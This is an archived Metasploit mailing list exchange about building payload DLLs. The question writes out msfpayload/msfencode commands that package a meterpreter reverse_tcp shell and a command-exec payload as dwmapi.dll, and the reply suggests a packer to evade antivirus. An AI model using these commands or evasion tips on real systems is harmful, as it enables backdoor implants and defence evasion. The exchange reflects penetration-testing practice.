Metasploit mailing list archives
Re: msfencode and dlls
From: HD Moore <hdm () metasploit com>
Date: Mon, 06 Sep 2010 15:11:15 -0500
On 9/6/2010 3:04 PM, R0me0 *** wrote:
Hello everyone, I tryed of the different forms encode meterpreter payload with msfencode and output to dll thus: ./msfpayload windows/meterpreter/reverse_tcp lhost=192.168.0.10 lport=25 R | ./msfencode -c 5 -t dll > dwmapi.dll and thus: ./msfpayload windows/exec CMD=custom.exe D > dwmapi.dll the first don't work the second works fine, but av detect it
Even if you encoded the payload in the first example, AV would still likely detect it. Try using a packer. -HD _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- msfencode and dlls R0me0 *** (Sep 06)
- Re: msfencode and dlls HD Moore (Sep 06)